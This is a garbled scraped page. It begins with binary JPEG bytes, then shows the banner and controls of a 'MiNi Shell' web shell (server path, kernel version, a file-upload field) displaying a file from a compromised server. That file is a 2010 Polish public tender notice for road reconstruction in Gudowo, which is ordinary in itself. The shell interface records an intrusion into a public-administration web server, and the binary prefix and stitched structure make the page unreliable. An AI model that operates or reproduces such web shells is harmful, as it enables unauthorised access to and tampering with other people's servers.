JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/137651-N-2010.html

<p class="kh_header"><b>Drawsko Pomorskie: Przebudowa dróg, powiatowej i gminnych w m. Gudowo</b><br>
<b>Numer ogłoszenia: 137651 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Złocieniecka 22 a, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 094 3633283, faks 094 3633283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatdrawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg, powiatowej i gminnych w m. Gudowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi powiatowej nr 1998Z od przejazdu kolejowego na długości 1,0 km, drogi gminnej do Ośrodka Wczasowego długość odc. około 360 mb, drogi gminnej na odc. 180 mb, drogi gminnej koło szkoły - wg załączonego rysunku sytuacyjnego, gm. Złocieniec, województwo zachodniopomorskie. Materiał z rozbiórki należy składować na terenie bazy materiałowej ZDP w miejscowości Suliszewo (odległość od miejsca budowy około 4 km).

Przedmiar obejmuje:
I.	Roboty pomiarowe i rozbiórkowe
1)		Roboty pomiarowe przy liniowych robotach ziemnych - 1,45 km
2)	Rozebranie krawężników betonowych o wym. 15x30 cm na podsypce piaskowej - 1968,30 m
3)	Rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych o wym. 35x35x5 cm na podsypce piaskowej - 2394,08 m2
4)	Rozebranie nawierzchni z płyt drogowych betonowych o gr. 12 cm z wypełnieniem spoin piaskiem na wjazdach z trelinki - 73,75 m2
5)	Wywóz na odl. 6 km bloków i brył o ciężarze do 50 kg - 515,20 t
II.	Krawężniki, obrzeża i chodniki
1)	Rowki o wym. 30x30 pod krawężniki i ławy krawężnikowe - 2800,0 m
2)	Wykonanie ławy betonowej z oporem pod krawężniki - 168,00 m3
3)	Ułożenie krawężników betonowych o wym. 15x30 cm na podsypce cementowo-piaskowej - 2800,00 m
4)	Ułożenie obrzeży o wym. 30x8 cm na posypce piaskowej z wypełnieniem spoin piaskiem - 1000,00 m
5)	Wykonanie podbudowy pod chodnik z kruszywa naturalnego o gr. po zagęszczeniu 6 cm - 2932,78 m2
6)	Ułożenie chodników z kostki betonowej POLBRUK typu 70/6 o gr. 60 mm na podsypce cementowo-piaskowej gr. 50 mm z wypełnieniem spoin piaskiem - 2932,78 m2
III.	Wjazdy
1)	Roboty ziemne w gruncie kat. III z transportem urobku na odl.  do 1,0 km - 215,78 m3
2)	Wykonanie podbudowy betonowej bez dylatacji pod kostkę betonową o gr. warstwy po zagęszczeniu 12 cm, beton B-10 - 593,13 m2
3)	Wykonanie warstwy dolnej podbudowy z kruszywa łamanego o gr. po zagęszczeniu 15 cm - 269,93 m2
4)	Wykonanie warstwy górnej podbudowy z kruszywa łamanego o gr. po zagęszczeniu   8 cm - 269,93 m2
5)	Wykonanie wjazdów do bram z kostki betonowej POLBRUK typu 70/8 gr. 80 mm na podsypce piaskowej gr. 50 mm z wypełnieniem spoin zaprawą cementową - 593,13 m2
6)	Skropienie nawierzchni emulsja asfaltową w ilości 50 kg/m2 na wjazdach z bitumu - 479,27 m2
7)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowych z warstwą wiążącą asfaltową o gr. po zagęszczeniu  cm - 479,27 m2
8)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowych z warstwą ścieralną asfaltową o gr. po zagęszczeniu 3 cm - 479,27 m2
IV.	Nawierzchnia drogowa
1)	Oczyszczenie mechaniczne nawierzchni ulepszonej z bitumu - 7500,00 m2
2)		Skropienie nawierzchni emulsją asfaltową - 7500,00 m2	
3)	Wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową o gr. średnio              4 cm - 200,00 t
4)	Wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową o gr. średnio            3 cm - 412,50 t
5)	 Skropienie nawierzchni emulsją asfaltową - 7500,00 m2	
6)	Nawierzchnia z mieszanek mineralno-bitumicznych grysowych z warstwą ścieralną asfaltową o gr. po zagęszczeniu 3 cm - 7500,00 m2
V.	Roboty inne
1)	Regulacja pionowa kratek ściekowych ulicznych - 6 szt.
2)	Regulacja pionowa włazów kanałowych - 20 szt.
3)	Regulacja zaworów wodociągowych i gazowych - 2 szt.
4)	Przygotowanie terenu pod obsadzenia kwiatowe w gruncie kat. III z uzupełnieniem gleby rodzimej warstwą ziemi o gr. 5 cm - 1200,00 m2
5)	Zdjęcie znaków - 10 szt.
6)	Przymocowanie znaków o pow. ponad 0,3 m2 - 10 szt.
7)	Przymocowanie znaków o pow. do 0,3 m2, tabliczki typu T - 3 szt.
8)	Przymocowanie znaków o pow. ponad 0,3 m2, tablice miejscowości i D-42, D-43 i drogowskaz - 9 szt.
9)	Słupki do znaków drogowych z rur stalowych o śr. 70 mm - 18 szt. 
VI.	Odcinek gminny - droga do Ośrodka Wczasowego
1)	Oczyszczenie nawierzchni ulepszonej z bitumu - 1898,00 m2
2)	Skropienie nawierzchni emulsją asfaltową - 1898,00 m2
3)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowych z warstwą ścieralną asfaltową o gr. po zagęszczeniu 3 cm - 1898,00 m2 m2
4)	Regulacja pionowa włazów kanałowych - 2 szt.
VII.	Odcinek gminny - droga koło szkoły
1)	Krawężniki
- rozebranie krawężników betonowych o wym. 15x30 cm na podsypce piaskowej - 100,00m
- rowki o wymiarach 30x30 cm pod krawężniki i ławy krawężnikowe - 230,00 m
- ława betonowa z oporem pod krawężniki - 13,80 m3
- krawężniki betonowe o wym. 15x30 wystające na podsypce cementowo-piaskowej - 230,00 m
2) Roboty nawierzchniowe
- oczyszczenie nawierzchni ulepszonej z bitumu - 1123,22 m2
- skropienie nawierzchni emulsją asfaltową - 1123,22 m2
- nawierzchnia z mieszanek mineralno-bitumicznych grysowych z warstwą ścieralną asfaltową o gr. po zagęszczeniu 3 cm - 1123,22 m2
- regulacja pionowa kratek ściekowych ulicznych - 3 szt.
- regulacja pionowa włazów kanałowych - 1 szt.
3)  wjazdy i miejsce postoju
 - roboty ziemne z transportem urobku na odl. do 1,0 km - 71,15 m3
- rowki o wym. 30x30 cm pod krawężniki i ławy krawężnikowe - 67,00m
- ława betonowa z oporem pod krawężniki - 4,02 m3
- krawężniki betonowe o wym. 15x30 cm wystające na podsypce cementowo-piaskowej -  67,00 m
- profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni - 415,74 m2
 - warstwa dolna podbudowy z kruszywa łamanego o gr. po zagęszczeniu 15 cm - 415,74 m2
 - Wjazdy do bram i miejsc postoju z kostki betonowej POLBRUK typu 70/8 gr. 80 mm na  podsypce cementowo-piaskowej gr. 50 mm z wypełnieniem spoin zaprawą cementową - 415,74 m2
4)	 Wjazdy indywidualne
- roboty ziemne z transportem urobku na odl. do 1,0 km - 171,19 m3
- podbudowa betonowa z B-10 bez dylatacji o gr. warstwy po zagęszczeniu 12 cm - 180,15 m2
- Wjazdy do bram i miejsc postoju z kostki betonowej POLBRUK typu 70/8 gr. 80 mm na podsypce cementowo-piaskowej gr. 50 mm z wypełnieniem spoin zaprawą cementową - 180,15 m2
- krawężniki betonowe o wym. 15x30 cm wystające na podsypce cementowo-piaskowej - 124,00 m
- ława betonowa z oporem pod krawężniki - 7,44 m3
VIII.	Odcinek gminny - droga , działka nr 206/2 -  dł. odcinka 180 m
1)	Roboty pomiarowe przy robotach ziemnych - 0,180 km
2)	Rozebranie nawierzchni z brukowca gr. 16-20 cm - 13,00 m2
3)	Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 6 cm - 72,00 m2
4)	Przewóz materiałów sztukowych oraz gruzu na odl. 5 km - 6,67 t
5)	Koryta wykonywane na poszerzeniach jezdni lub chodników o gł. 30 cm - 253,35 m2
6)	Przewóz materiałów sypkich na odl. 5km - wywóz ziemi z koryta - 163,157 t
7)	Plantowanie powierzchni gruntu rodzimego kat. IV - 80,00 m2
8)	Wykonanie warstwy odcinającej o gr. po zagęszczeniu 10 cm - 253,35 m2
9)	Wykonanie podbudowy z kruszywa łamanego 0-31,5 stabilizowanego mechanicznie, grubość po zagęszczeniu 15 cm - 253,35 m2
10)	Wykonanie warstwy dolnej podbudowy z kruszywa łamanego o gr. po zagęszczeniu 15 cm-za każdy dalszy 1 cm (25-15=10) - 2533,50 m2
11)	Przewóz materiałów sypkich na odl. do 10 km (piasek w-wy odcinające+kruszywo łamane na podbudowy) - 174,86 t
12)	Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową - 53,20 t
13)	Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną-dodatek za dalszy 1 km przewozu mieszanki ponad 5 km - 106,40 t
14)	Wykonanie nawierzchni z kostki brukowej POLBRUK gr. 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem (szara-zjazdy) - 86,60 m2
15)	Oczyszczenie nawierzchni nieulepszonej - 2049,75 m2
16)	Skropienie nawierzchni asfaltem - 2049,75 m2
17)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych - warstwa wiążąca o gr. po zagęszczeniu 6 cm - 672,50 m2
18)	Wykonanie nawierzchni mineralno-bitumicznych asfaltowych-dodatek za każdy dalszy 1 km przewozu mieszanki ponad 5 km - 196,638 t
19)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych-warstwa ścieralna o gr. po zagęszczeniu 4 cm - 705,75 m2
20)	Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych-dodatek za każdy dalszy 1 km przewozu mieszanki ponad 5 km - 141,15 t
21)	Ułożenie krawężników betonowych wystających o wym. 15x30 cm z wykonaniem ławy z betonu B-15 na podsypce cementowo-piaskowej - 108,60 m
22)Oczyszczenie rowu z namułu o gr. 30 cm z wyprofilowaniem skarp - 50,00 m
23)	Przewóz materiałów sypkich na odl. do 5 km (wywóz nadmiaru ziemi z wykopu-oczyszczenie rowu) - 40,32 t
24)	Naprawy poboczy (ścinanie o gr. 20 cm) - 80,00 m2
25)	Przewóz materiałów sypkich na odl. do 5 km (wywóz nadmiaru ziemi z wykopu-oczyszczenie rowu) - 22,40 t
26)	Regulacja pionowa włazów kanałowych - 3 szt.

Szczegółowe informacje zawarte są w przedmiarze, Specyfikacjach Technicznych,  pisie technicznym, załącznikach graficznych dołączonych do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wpis do ewidencji działalności gospodarczej lub zgłoszenie do ewidencji działalności gospodarczej w zakresie robót związanych z budową obiektów inżynierii lądowej i wodnej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać się wykonaniem w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej trzech robót o podobnej wartości z podaniem jego wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzajacych, że zamówienie to zostało wykonane należycie zgodnie ze sztuką budowlaną</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować osobami posiadającymi aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń oraz aktualne dokumenty potwierdzające przynależność kierwonika do właściwej Izby Inżynierów Budownictwa lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób posiadajacych wyżej wymienione uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>należy przedstawic dokumenty o nie zaleganiu z opłaceniem podatków oraz o nie zaleganiu z opłacaniem opłat oraz składek na ubezpieczenia zdrowotne i społeczne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem  podawanych warunków ich wprowadzenia.  
1.	zmiana okresu przewidzianego na ukończenie robót   
1)	zmiany spowodowane warunkami atmosferycznymi w szczególności:
a)	klęski żywiołowe;
b)	warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
2)	zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy; wykopaliska archeologiczne;
3)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
4)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a)	wstrzymanie robót przez Zamawiającego;
b)	konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót;
c)	 zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, w szczególności:
- przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;
- odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
6)  inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy  skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych Kontraktem, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych zgodnie z przepisami odrębnymi; 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  
2.	Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
3)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
5)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
